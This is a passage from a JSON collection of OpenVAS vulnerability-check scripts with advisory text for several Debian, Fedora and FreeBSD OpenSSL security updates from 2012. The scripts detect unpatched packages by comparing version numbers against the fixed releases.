issues:\n\nCVE-2012-0884\n\nIvan Nestlerode discovered a weakness in the CMS and PKCS #7\nimplementations that could allow an attacker to decrypt data\nvia a Million Message Attack (MMA).\n\nCVE-2012-1165\n\nIt was discovered that a NULL pointer could be dereferenced\nwhen parsing certain S/MIME messages, leading to denial of\nservice.\n\nCVE-2012-2110\n\nTavis Ormandy, Google Security Team, discovered a vulnerability\nin the way DER-encoded ASN.1 data is parsed that can result in\na heap overflow.\n\n\nAdditionally, the fix for CVE-2011-4619 has been updated to address an\nissue with SGC handshakes.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 0.9.8o-4squeeze11.\n\nFor the testing distribution (wheezy), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.1a-1.\n\nWe recommend that you upgrade your openssl packages.\";\ntag_summary = \"The remote host is missing an update to openssl\nannounced via advisory DSA 2454-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202454-1\";\n\nif(description)\n{\n script_id(71259);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2012-0884\", \"CVE-2012-1165\", \"CVE-2012-2110\", \"CVE-2011-4619\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:57:50 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Debian Security Advisory DSA 2454-1 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libcrypto0.9.8-udeb\", ver:\"0.9.8o-4squeeze7\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:41", "description": "The remote host is missing an update to openssl\nannounced via advisory DSA 2454-1.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2454-1 (openssl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1165", "CVE-2011-4619", "CVE-2012-2110", "CVE-2012-0884"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231071259", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071259", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2454_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2454-1 (openssl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71259\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2012-0884\", \"CVE-2012-1165\", \"CVE-2012-2110\", \"CVE-2011-4619\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:57:50 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Debian Security Advisory DSA 2454-1 (openssl)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202454-1\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been found in OpenSSL. The Common\nVulnerabilities and Exposures project identifies the following issues:\n\nCVE-2012-0884\n\nIvan Nestlerode discovered a weakness in the CMS and PKCS #7\nimplementations that could allow an attacker to decrypt data\nvia a Million Message Attack (MMA).\n\nCVE-2012-1165\n\nIt was discovered that a NULL pointer could be dereferenced\nwhen parsing certain S/MIME messages, leading to denial of\nservice.\n\nCVE-2012-2110\n\nTavis Ormandy, Google Security Team, discovered a vulnerability\nin the way DER-encoded ASN.1 data is parsed that can result in\na heap overflow.\n\n\nAdditionally, the fix for CVE-2011-4619 has been updated to address an\nissue with SGC handshakes.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 0.9.8o-4squeeze11.\n\nFor the testing distribution (wheezy), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.1a-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your openssl packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to openssl\nannounced via advisory DSA 2454-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libcrypto0.9.8-udeb\", ver:\"0.9.8o-4squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-02T10:57:12", "description": "Check for the Version of openssl", "cvss3": {}, "published": "2012-05-11T00:00:00", "type": "openvas", "title": "Fedora Update for openssl FEDORA-2012-6395", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1165", "CVE-2012-0050", "CVE-2012-2110", "CVE-2012-0884", "CVE-2011-3207"], "modified": "2017-12-26T00:00:00", "id": "OPENVAS:864229", "href": "http://plugins.openvas.org/nasl.php?oid=864229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssl FEDORA-2012-6395\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"openssl on Fedora 15\";\ntag_insight = \"The OpenSSL toolkit provides support for secure communications between\n machines. OpenSSL includes a certificate management tool and shared\n libraries which provide various cryptographic algorithms and\n protocols.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080176.html\");\n script_id(864229);\n script_version(\"$Revision: 8245 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-26 07:29:59 +0100 (Tue, 26 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-11 11:01:52 +0530 (Fri, 11 May 2012)\");\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-0884\", \"CVE-2012-1165\", \"CVE-2012-0050\",\n \"CVE-2011-3207\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-6395\");\n script_name(\"Fedora Update for openssl FEDORA-2012-6395\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0i~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:58", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2012-08-10T00:00:00", "type": "openvas", "title": "FreeBSD Ports: FreeBSD", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4576", "CVE-2011-4619", "CVE-2012-2110", "CVE-2012-0884", "CVE-2011-4109"], "modified": "2017-04-17T00:00:00", "id": "OPENVAS:71533", "href": "http://plugins.openvas.org/nasl.php?oid=71533", "sourceData": "#\n#VID 2ae114de-c064-11e1-b5e0-000c299b62e1\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 2ae114de-c064-11e1-b5e0-000c299b62e1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: FreeBSD\n\nCVE-2011-4576\nThe SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before\n1.0.0f does not properly initialize data structures for block cipher\npadding, which might allow remote attackers to obtain sensitive\ninformation by decrypting the padding data sent by an SSL peer.\nCVE-2011-4619\nThe Server Gated Cryptography (SGC) implementation in OpenSSL before\n0.9.8s and 1.x before 1.0.0f does not properly handle handshake\nrestarts, which allows remote attackers to cause a denial of service\nvia unspecified vectors.\nCVE-2011-4109\nDouble free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when\nX509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have\nan unspecified impact by triggering failure of a policy check.\nCVE-2012-0884\nThe implementation of Cryptographic Message Syntax (CMS) and PKCS #7\nin OpenSSL before 0.9.8u and 1.x before 1.0.0h does not properly\nrestrict certain oracle behavior, which makes it easier for\ncontext-dependent attackers to decrypt data via a Million Message\nAttack (MMA) adaptive chosen ciphertext attack.\nCVE-2012-2110\nThe asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL\nbefore 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not\nproperly interpret integer data, which allows remote attackers to\nconduct buffer overflow attacks, and cause a denial of service (memory\ncorruption) or possibly have unspecified other impact, via crafted DER\ndata, as demonstrated by an X.509 certificate or an RSA public key.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(71533);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-4576\", \"CVE-2011-4619\", \"CVE-2011-4109\", \"CVE-2012-0884\", \"CVE-2012-2110\");\n script_version(\"$Revision: 5958 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-17 11:02:19 +0200 (Mon, 17 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:22:17 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"FreeBSD Ports: FreeBSD\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\nvuln = 0;\ntxt = \"\";\nbver = portver(pkg:\"FreeBSD\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.4\")>=0 && revcomp(a:bver, b:\"7.4_8\")<0) {\n txt += \"Package FreeBSD version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.1\")>=0 && revcomp(a:bver, b:\"8.1_10\")<0) {\n txt += \"Package FreeBSD version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.2\")>=0 && revcomp(a:bver, b:\"8.2_8\")<0) {\n txt += \"Package FreeBSD version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.3\")>=0 && revcomp(a:bver, b:\"8.3_2\")<0) {\n txt += \"Package FreeBSD version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0\")>=0 && revcomp(a:bver, b:\"9.0_2\")<0) {\n txt += \"Package FreeBSD version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt ));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:41", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "openvas", "title": "Fedora Update for openssl FEDORA-2012-8014", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2333", "CVE-2012-1165", "CVE-2012-0050", "CVE-2012-2110", "CVE-2012-0884"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864279", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssl FEDORA-2012-8014\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/081711.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864279\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-04 11:06:57 +0530 (Mon, 04 Jun 2012)\");\n script_cve_id(\"CVE-2012-2333\", \"CVE-2012-2110\", \"CVE-2012-0884\", \"CVE-2012-1165\",\n \"CVE-2012-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-8014\");\n script_name(\"Fedora Update for openssl FEDORA-2012-8014\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"openssl on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0j~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:59", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2012-08-10T00:00:00", "type": "openvas", "title": "FreeBSD Ports: FreeBSD", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4576", "CVE-2011-4619", "CVE-2012-2110", "CVE-2012-0884", "CVE-2011-4109"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231071533", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071533", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_FreeBSD19.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 2ae114de-c064-11e1-b5e0-000c299b62e1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71533\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-4576\", \"CVE-2011-4619\", \"CVE-2011-4109\", \"CVE-2012-0884\", \"CVE-2012-2110\");\n script_version(\"$Revision: 11762 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:22:17 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"FreeBSD Ports: FreeBSD\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: FreeBSD\n\nCVE-2011-4576\nThe SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before\n1.0.0f does not properly initialize data structures for block cipher\npadding, which might allow remote attackers to obtain sensitive\ninformation by decrypting the padding data sent by an SSL peer.\nCVE-2011-4619\nThe Server Gated Cryptography (SGC) implementation in OpenSSL before\n0.9.8s and 1.x before 1.0.0f does not properly handle handshake\nrestarts, which allows remote attackers to cause a denial of service\nvia unspecified vectors.\nCVE-2011-4109\nDouble free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when\nX509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have\nan unspecified impact by triggering failure of a policy check.\nCVE-2012-0884\nThe implementation of Cryptographic Message Syntax (CMS) and PKCS #7\nin OpenSSL before 0.9.8u and 1.x before 1.0.0h does not properly\nrestrict certain oracle behavior, which makes it easier for\ncontext-dependent attackers to decrypt data via a Million Message\nAttack (MMA) adaptive chosen ciphertext attack.\nCVE-2012-2110\nThe asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL\nbefore 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not\nproperly interpret integer data, which allows remote attackers to\nconduct buffer overflow attacks, and cause a denial of service (memory\ncorruption) or possibly have unspecified other impact, via crafted DER\ndata, as demonstrated by an X.509 certificate or an RSA public key.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"FreeBSD\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.4\")>=0 && revcomp(a:bver, b:\"7.4_8\")<0) {\n txt += \"Package FreeBSD version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.1\")>=0 && revcomp(a:bver, b:\"8.1_10\")<0) {\n txt += \"Package FreeBSD version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.2\")>=0 && revcomp(a:bver, b:\"8.2_8\")<0) {\n txt += \"Package FreeBSD version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.3\")>=0 && revcomp(a:bver, b:\"8.3_2\")<0) {\n txt += \"Package FreeBSD version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0\")>=0 && revcomp(a:bver, b:\"9.0_2\")<0) {\n txt += \"Package FreeBSD version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:22", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-05-11T00:00:00", "type": "openvas", "title": "Fedora Update for openssl FEDORA-2012-6395", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1165", "CVE-2012-0050", "CVE-2012-2110", "CVE-2012-0884", "CVE-2011-3207"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssl FEDORA-2012-6395\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080176.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864229\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-11 11:01:52 +0530 (Fri, 11 May 2012)\");\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-0884\", \"CVE-2012-1165\", \"CVE-2012-0050\",\n \"CVE-2011-3207\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-6395\");\n script_name(\"Fedora Update for openssl FEDORA-2012-6395\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"openssl on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n 